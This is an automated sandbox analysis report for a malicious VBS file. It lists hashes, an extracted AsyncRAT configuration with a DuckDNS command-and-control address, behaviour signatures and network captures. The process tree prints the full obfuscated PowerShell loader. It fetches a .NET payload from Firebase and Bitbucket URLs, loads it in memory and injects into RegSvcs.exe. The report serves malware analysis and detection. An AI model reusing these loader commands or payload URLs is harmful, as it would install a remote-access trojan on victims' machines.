Analysis
-
max time kernel
92s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system -
submitted
09-08-2024 01:27
Static task
static1
Behavioral task
behavioral1
Sample
7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs
Resource
win7-20240704-en
General
-
Target
7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs
-
Size
23.1MB
-
MD5
c7b73269543ae666701b2d97172b93fb
-
SHA1
e6d9435df4b136ceac144b84ec9b8fa7cfead13a
-
SHA256
7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c
-
SHA512
3cbd06d2e480e3b62f0881a51f7f94f797201de3b6053f1f6b7728c9e3467c24c5f58d5a2304d75487703ce496de9a5d4ee795cab6a08eefa45dc68324590287
-
SSDEEP
1536:VPadPlP4PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPm:8v
Malware Config
Extracted
https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe
Extracted
asyncrat
1.0.7
Default
zorra123.duckdns.org:2020
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 2 512 powershell.exe 20 512 powershell.exe 22 512 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry, likely used for geofencing.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 4848 powershell.exe 512 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 bitbucket.org 20 bitbucket.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 512 set thread context of 436 512 powershell.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4848 powershell.exe 4848 powershell.exe 512 powershell.exe 512 powershell.exe 512 powershell.exe 512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4848 powershell.exe Token: SeDebugPrivilege 512 powershell.exe Token: SeDebugPrivilege 436 RegSvcs.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2636 wrote to memory of 4848 2636 WScript.exe 85 PID 2636 wrote to memory of 4848 2636 WScript.exe 85 PID 4848 wrote to memory of 512 4848 powershell.exe 88 PID 4848 wrote to memory of 512 4848 powershell.exe 88 PID 512 wrote to memory of 2648 512 powershell.exe 89 PID 512 wrote to memory of 2648 512 powershell.exe 89 PID 512 wrote to memory of 2648 512 powershell.exe 89 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90 PID 512 wrote to memory of 436 512 powershell.exe 90
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bq▒HI▒Z▒B1▒HI▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒G8▒dQBl▒Ho▒cw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HU▒ZQBm▒H▒▒ag▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒dQBl▒GY▒c▒Bq▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒JwB0▒Hg▒d▒▒u▒G8▒dgBl▒HU▒bgBv▒Gk▒dgBu▒GU▒LwBz▒GQ▒YQBv▒Gw▒bgB3▒G8▒Z▒▒v▒HM▒YQBn▒HI▒YQBj▒HM▒ZQBk▒C8▒YwBk▒HM▒YQBj▒GQ▒LwBn▒HI▒bw▒u▒HQ▒ZQBr▒GM▒dQBi▒HQ▒aQBi▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒bwB1▒GU▒egBz▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒GU▒cgB0▒Gc▒cQBl▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bq▒HI▒Z▒B1▒HI▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs');powershell -command $KByHL;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$jrdur = '0';$ouezs = 'C:\Users\Admin\AppData\Local\Temp\7b6d6d51a0032be0ac9c3b857065a2ba87caa96dac3d0023d8819eb3baa6dd8c.vbs';[Byte[]] $uefpj = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uefpj).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $ouezs , '_____ertgqe__________________-------------', $jrdur, '1', 'Roda' ));"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:2648
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
-
Network
-
Remote address:8.8.8.8:53Requestfirebasestorage.googleapis.comIN AResponsefirebasestorage.googleapis.comIN A172.217.168.202firebasestorage.googleapis.comIN A142.251.39.106firebasestorage.googleapis.comIN A142.250.179.138firebasestorage.googleapis.comIN A172.217.23.202firebasestorage.googleapis.comIN A142.250.179.170firebasestorage.googleapis.comIN A142.251.36.42firebasestorage.googleapis.comIN A142.251.36.10firebasestorage.googleapis.comIN A142.250.179.202firebasestorage.googleapis.comIN A216.58.214.10
-
GEThttps://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffepowershell.exeRemote address:172.217.168.202:443RequestGET /v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe HTTP/1.1
Host: firebasestorage.googleapis.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Fri, 09 Aug 2024 01:27:26 GMT
Cache-Control: private, max-age=0
Last-Modified: Wed, 03 Jul 2024 14:08:24 GMT
ETag: "5acaccbd879c3f61007eb990ca8b218a"
x-goog-generation: 1720015704370424
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 12972
x-goog-meta-firebaseStorageDownloadTokens: 61c829f6-e196-49e8-b4ff-041134577ffe
Content-Type: text/plain
Content-Disposition: inline; filename*=utf-8''dll%20Hope.txt
x-goog-hash: crc32c=W9dNRw==
x-goog-hash: md5=WsrMvYecP2EAfrmQyoshig==
x-goog-storage-class: STANDARD
Accept-Ranges: bytes
Content-Length: 12972
X-GUploader-UploadID: AHxI1nN9UiHrYcWyxVZXLqRlGAzPzQ8PbVMuRPf-GDQib2FUgol5EKoNmEiFt9twRNHZUFQj7bE
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
GEThttps://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362powershell.exeRemote address:172.217.168.202:443RequestGET /v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362 HTTP/1.1
Host: firebasestorage.googleapis.com
ResponseHTTP/1.1 200 OK
Date: Fri, 09 Aug 2024 01:27:26 GMT
Cache-Control: private, max-age=0
Last-Modified: Wed, 03 Jul 2024 14:01:52 GMT
ETag: "943e47fb5db1e3ea3fd3dc15ea548bb9"
x-goog-generation: 1720015312004933
x-goog-metageneration: 1
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 26536
x-goog-meta-firebaseStorageDownloadTokens: 7fe13398-6aa2-43e8-992c-35095e035362
Content-Type: text/plain
Content-Disposition: inline; filename*=utf-8''Pe%20Hope.txt
x-goog-hash: crc32c=HduiyA==
x-goog-hash: md5=lD5H+12x4+o/09wV6lSLuQ==
x-goog-storage-class: STANDARD
Accept-Ranges: bytes
Content-Length: 26536
X-GUploader-UploadID: AHxI1nNIwbBc25dxE9W2DJTPUsT34HoaPuu8T_VOYqlP1VaVDq9PNZ4LXXlMzysVR92j-pHB0-XJ_nk4Iw
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.dual-a-0034.a-msedge.netg-bing-com.dual-a-0034.a-msedge.netIN CNAMEdual-a-0034.a-msedge.netdual-a-0034.a-msedge.netIN A204.79.197.237dual-a-0034.a-msedge.netIN A13.107.21.237
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=3BA29E871DE267F8084F8A511C0266B4; domain=.bing.com; expires=Wed, 03-Sep-2025 01:27:26 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 9004DF6BC08E439AA95AD5EE3AA57132 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
date: Fri, 09 Aug 2024 01:27:25 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3BA29E871DE267F8084F8A511C0266B4
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=sS6RtUKbaiXiKMJ0OBmt2h1uTxQNhgdOLM-MSZxmVIQ; domain=.bing.com; expires=Wed, 03-Sep-2025 01:27:26 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 6B30D7C49CDF4B51B75B716C2ADFD483 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
date: Fri, 09 Aug 2024 01:27:25 GMT
-
GEThttps://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=Remote address:204.79.197.237:443RequestGET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid= HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=3BA29E871DE267F8084F8A511C0266B4; MSPTC=sS6RtUKbaiXiKMJ0OBmt2h1uTxQNhgdOLM-MSZxmVIQ
ResponseHTTP/2.0 204
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: B57495C9FED146DE8C65967521672062 Ref B: LON04EDGE1006 Ref C: 2024-08-09T01:27:26Z
date: Fri, 09 Aug 2024 01:27:25 GMT
-
Remote address:8.8.8.8:53Request202.168.217.172.in-addr.arpaIN PTRResponse202.168.217.172.in-addr.arpaIN PTRams16s32-in-f10.1e100.net
-
Remote address:8.8.8.8:53Request20.160.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request237.197.79.204.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.210.232.199.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestbitbucket.orgIN AResponsebitbucket.orgIN A185.166.141.9bitbucket.orgIN A185.166.141.8bitbucket.orgIN A185.166.141.7
-
Remote address:185.166.141.9:443RequestGET /dcasdc/descargas/downloads/envionuevo.txt HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
ResponseHTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: AtlassianEdge
Location: https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
Expires: Fri, 09 Aug 2024 01:27:26 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
X-Used-Mesh: False
Vary: Accept-Language, Origin
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Dc-Location: Micros-3
X-Served-By: 94aa115e3b4c
X-Version: d5ee04fb2c50
X-Static-Version: d5ee04fb2c50
X-Request-Count: 235
X-Render-Time: 0.045334577560424805
X-B3-Traceid: b55ab0c43fb54e239bc27e1a04048e4e
X-B3-Spanid: c70d8cfe88c24ed9
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ 
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; base-uri 'self'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
X-Usage-Quota-Remaining: 999183.155
X-Usage-Request-Cost: 830.20
X-Usage-User-Time: 0.020761
X-Usage-System-Time: 0.004145
X-Usage-Input-Ops: 0
X-Usage-Output-Ops: 0
Age: 0
X-Cache: MISS
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Atl-Traceid: b55ab0c43fb54e239bc27e1a04048e4e
Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
-
Remote address:8.8.8.8:53Requestbbuseruploads.s3.amazonaws.comIN AResponsebbuseruploads.s3.amazonaws.comIN CNAMEs3-1-w.amazonaws.coms3-1-w.amazonaws.comIN CNAMEs3-w.us-east-1.amazonaws.coms3-w.us-east-1.amazonaws.comIN A52.217.165.225s3-w.us-east-1.amazonaws.comIN A52.216.29.148s3-w.us-east-1.amazonaws.comIN A3.5.30.67s3-w.us-east-1.amazonaws.comIN A52.216.52.161s3-w.us-east-1.amazonaws.comIN A3.5.28.116s3-w.us-east-1.amazonaws.comIN A3.5.28.213s3-w.us-east-1.amazonaws.comIN A3.5.29.163s3-w.us-east-1.amazonaws.comIN A3.5.2.158
-
GEThttps://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315powershell.exeRemote address:52.217.165.225:443RequestGET 
/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315 HTTP/1.1
